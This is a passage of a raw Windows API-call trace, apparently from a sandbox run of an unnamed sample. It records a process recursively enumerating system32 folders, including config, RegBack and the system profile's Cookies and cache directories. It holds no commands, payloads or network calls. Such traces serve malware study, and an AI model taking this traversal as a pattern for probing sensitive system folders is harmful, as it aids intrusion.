cFileName=".", cAlternateFileName="")) returned 0x45a230 [0027.742] FindClose (in: hFindFile=0x45a230 | out: hFindFile=0x45a230) returned 1 [0027.743] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459fd8 | out: hHeap=0x420000) returned 1 [0027.743] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\*", lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84bfae1, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x8851be8, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x8851be8, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45a230 [0027.743] FindClose (in: hFindFile=0x45a230 | out: hFindFile=0x45a230) returned 1 [0027.743] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459fd8 | out: hHeap=0x420000) returned 1 [0027.743] FindClose (in: hFindFile=0x44e188 | out: hFindFile=0x44e188) returned 1 [0027.743] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458d78 | out: hHeap=0x420000) returned 1 [0027.743] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\com\\*", lpFindFileData=0x45b408 | out: lpFindFileData=0x45b408*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5f9c6, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x1e470555, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e470555, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x44e188 [0027.745] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\com\\dmp\\*", lpFindFileData=0x45c718 | out: lpFindFileData=0x45c718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xef7f2e, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xa35dd730, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c970 [0027.746] FindClose (in: hFindFile=0x45c970 | out: hFindFile=0x45c970) returned 1 [0027.746] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45c718 | out: hHeap=0x420000) returned 1 [0027.746] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\com\\en-US\\*", lpFindFileData=0x45c718 | out: lpFindFileData=0x45c718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e470555, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e470555, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45c970 [0027.746] FindClose (in: hFindFile=0x45c970 | out: hFindFile=0x45c970) returned 1 [0027.746] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45c718 | out: hHeap=0x420000) returned 1 [0027.746] FindClose (in: hFindFile=0x44e188 | out: hFindFile=0x44e188) returned 1 [0027.746] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45b408 | out: hHeap=0x420000) returned 1 [0027.746] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\*", lpFindFileData=0x45b4c0 | out: lpFindFileData=0x45b4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xf1e088, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xf1e088, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x44e188 [0027.747] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\Journal\\*", lpFindFileData=0x45b718 | out: lpFindFileData=0x45b718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xef7f2e, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xadb261cb, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c, dwReserved1=0x78, cFileName=".", cAlternateFileName="")) returned 0x45b970 [0027.747] FindClose (in: hFindFile=0x45b970 | out: hFindFile=0x45b970) returned 1 [0027.747] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45b718 | out: hHeap=0x420000) returned 1 [0027.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\RegBack\\*", lpFindFileData=0x45b718 | out: lpFindFileData=0x45b718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xef7f2e, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xadb261cb, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c, dwReserved1=0x78, cFileName=".", cAlternateFileName="")) returned 0x45b970 [0027.748] FindClose (in: hFindFile=0x45b970 | out: hFindFile=0x45b970) returned 1 [0027.748] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45b718 | out: hHeap=0x420000) returned 1 [0027.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\*", lpFindFileData=0x45b718 | out: lpFindFileData=0x45b718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xef7f2e, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xef7f2e, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c, dwReserved1=0x78, cFileName=".", cAlternateFileName="")) returned 0x45b970 [0027.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\*", lpFindFileData=0x45e7d8 | out: lpFindFileData=0x45e7d8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x51ab36f5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x51ab36f5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45ea30 [0027.749] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\*", lpFindFileData=0x45b9b0 | out: lpFindFileData=0x45b9b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x24a30ea6, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a30ea6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfef8, dwReserved1=0x45d7d0, cFileName=".", cAlternateFileName="")) returned 0x45bc08 [0027.749] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x460a80 | out: lpFindFileData=0x460a80*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a30ea6, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a30ea6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x460cd8 [0027.750] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\*", lpFindFileData=0x45bc48 | out: lpFindFileData=0x45bc48*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2829382e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x2829382e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x45bea0 [0027.750] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Caches\\*", lpFindFileData=0x462d28 | out: lpFindFileData=0x462d28*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2829382e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2829382e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x2829382e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x462f80 [0027.751] FindClose (in: hFindFile=0x462f80 | out: hFindFile=0x462f80) returned 1 [0027.751] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x462d28 | out: hHeap=0x420000) returned 1 [0027.751] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\*", lpFindFileData=0x45bee0 | out: lpFindFileData=0x45bee0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a57006, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a57006, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650074, dwReserved1=0x33006d, cFileName=".", cAlternateFileName="")) returned 0x45c138 [0027.751] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\*", lpFindFileData=0x45c178 | out: lpFindFileData=0x45c178*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24aa32c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24aa32c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x45c3d0 [0027.752] FindClose (in: hFindFile=0x45c3d0 | out: hFindFile=0x45c3d0) returned 1 [0027.752] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45c178 | out: hHeap=0x420000) returned 1 [0027.752] FindClose (in: hFindFile=0x45c138 | out: hFindFile=0x45c138) returned 1 [0027.752] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45bee0 | out: hHeap=0x420000) returned 1 [0027.752] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\*", lpFindFileData=0x45bee0 | out: lpFindFileData=0x45bee0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a30ea6, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a30ea6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650074, dwReserved1=0x33006d, cFileName=".", cAlternateFileName="")) returned 0x45c138 [0027.752] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x45c178 | out: lpFindFileData=0x45c178*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x45c3d0 [0027.753] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\0PS72R2M\\*", lpFindFileData=0x45c410 | out: lpFindFileData=0x45c410*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a7d166, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x464d38 [0027.753] FindClose (in: hFindFile=0x464d38 | out: hFindFile=0x464d38) returned 1 [0027.753] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45c410 | out: hHeap=0x420000) returned 1 [0027.753] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\62AXOPQ5\\*", lpFindFileData=0x45c410 | out: lpFindFileData=0x45c410*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a7d166, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x464d38 [0027.753] FindClose (in: hFindFile=0x464d38 | out: hFindFile=0x464d38) returned 1 [0027.753] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45c410 | out: hHeap=0x420000) returned 1 [0027.753] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\FZG8CKJ5\\*", lpFindFileData=0x45c410 | out: lpFindFileData=0x45c410*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a7d166, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x464d38 [0027.754] FindClose (in: hFindFile=0x464d38 | out: hFindFile=0x464d38) returned 1 [0027.754] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45c410 | out: hHeap=0x420000) returned 1 [0027.754] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\LIXMVQOA\\*", lpFindFileData=0x45c410 | out: lpFindFileData=0x45c410*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a7d166, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x464d38 [0027.755] FindClose (in: hFindFile=0x464d38 | out: hFindFile=0x464d38) returned 1 [0027.755] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45c410 | out: hHeap=0x420000) returned 1 [0027.755] FindClose (in: hFindFile=0x45c3d0 | out: hFindFile=0x45c3d0) returned 1 [0027.755] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45c178 | out: hHeap=0x420000) returned 1 [0027.755] FindClose (in: hFindFile=0x45c138 | out: hFindFile=0x45c138) returned 1 [0027.755] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45bee0 | out: hHeap=0x420000) returned 1 [0027.755] FindClose (in: hFindFile=0x45bea0 | out: hFindFile=0x45bea0) returned 1 [0027.755] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45bc48 | out: hHeap=0x420000) returned 1 [0027.755] FindClose (in: hFindFile=0x460cd8 | out: hFindFile=0x460cd8) returned 1 [0027.755] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x460a80 | out: hHeap=0x420000) returned 1 [0027.755] FindClose (in: hFindFile=0x45bc08 | out: hFindFile=0x45bc08) returned 1 [0027.755] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45b9b0 | out: hHeap=0x420000) returned 1 [0027.755] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\*", lpFindFileData=0x45b9b0 | out: lpFindFileData=0x45b9b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x51ab36f5, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfef8, dwReserved1=0x45d7d0, cFileName=".", cAlternateFileName="")) returned 0x45bc08 [0027.757] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x45bc48 | out: lpFindFileData=0x45bc48*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x524ab327, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x45bea0 [0027.759] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x45bee0 | out: lpFindFileData=0x45bee0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x524ab327, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650074, dwReserved1=0x33006d, cFileName=".", cAlternateFileName="")) returned 0x45c138 [0027.759] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x45c178 | out: lpFindFileData=0x45c178*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x524ab327, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x45c3d0 [0027.760] FindClose (in: hFindFile=0x45c3d0 | out: hFindFile=0x45c3d0) returned 1 [0027.760] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45c178 | out: hHeap=0x420000) returned 1 [0027.760] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x45c178 | out: lpFindFileData=0x45c178*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x524ab327, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x45c3d0 [0027.760] FindClose (in: hFindFile=0x45c3d0 | out: hFindFile=0x45c3d0) returned 1 [0027.760] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45c178 | out: hHeap=0x420000) returned 1 [0027.760] FindClose (in: hFindFile=0x45c138 | out: hFindFile=0x45c138) returned 1 [0027.760] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45bee0 | out: hHeap=0x420000) returned 1 [0027.760] FindClose (in: hFindFile=0x45bea0 | out: hFindFile=0x45bea0) returned 1 [0027.760] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45bc48 | out: hHeap=0x420000) returned 1 [0027.760] FindClose (in: hFindFile=0x45bc08 | out: hFindFile=0x45bc08) returned 1 [0027.760] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45b9b0 | out: hHeap=0x420000) returned 1 [0027.760] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\*", lpFindFileData=0x45b9b0 | out: lpFindFileData=0x45b9b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a57006, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a57006, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfef8, dwReserved1=0x45d7d0, cFileName=".", cAlternateFileName="")) returned 0x45bc08 [0027.761] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x45bc48 | out: lpFindFileData=0x45bc48*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a57006, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a57006, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x52005c, cFileName=".", cAlternateFileName="")) returned 0x45bea0 [0027.761] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x45bee0 | out: lpFindFileData=0x45bee0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a57006, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a57006, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650074, dwReserved1=0x33006d, cFileName=".", cAlternateFileName="")) returned 0x45c138 [0027.762] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*", lpFindFileData=0x45c178 | out: lpFindFileData=0x45c178*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24aa32c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24aa32c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x52005c, cFileName=".", cAlternateFileName="")) returned 0x45c3d0 [0027.762] FindClose (in: hFindFile=0x45c3d0 | out: hFindFile=0x45c3d0) returned 1 [0027.762] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45c178 | out: hHeap=0x420000) returned 1 [0027.762] FindClose (in: hFindFile=0x45c138 | out: hFindFile=0x45c138) returned 1 [0027.762] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45bee0 | out: hHeap=0x420000) returned 1 [0027.762] FindClose (in: hFindFile=0x45bea0 | out: hFindFile=0x45bea0) returned 1 [0027.764] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45bc48 | out: hHeap=0x420000) returned 1 [0027.764] FindClose (in: hFindFile=0x45bc08 | out: hFindFile=0x45bc08) returned 1 [0027.764] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45b9b0 | out: hHeap=0x420000) returned 1 [0027.764] FindClose (in: hFindFile=0x45ea30 | out: hFindFile=0x45ea30) returned 1 [0027.764] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45e7d8 | out: hHeap=0x420000) returned 1 [0027.764] FindClose (in: hFindFile=0x45b970 | out: hFindFile=0x45b970) returned 1 [0027.765] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45b718 | out: hHeap=0x420000) returned 1 [0027.765] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\TxR\\*", lpFindFileData=0x45b718 | out: lpFindFileData=0x45b718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xf1e088, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xadb261cb, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c, dwReserved1=0x78, cFileName=".", cAlternateFileName="")) returned 0x45b970 [0027.765] FindClose (in: hFindFile=0x45b970 | out: hFindFile=0x45b970) returned 1 [0027.765] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45b718 | out: hHeap=0x420000) returned 1 [0027.765] FindClose (in: hFindFile=0x44e188 | out: hFindFile=0x44e188) returned 1 [0027.765] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45b4c0 | out: hHeap=0x420000) returned 1 [0027.765] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\cs-CZ\\*", lpFindFileData=0x45b4c0 | out: lpFindFileData=0x45b4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8cc4abd3, ftLastAccessTime.dwHighDateTime=0x1cb892c, 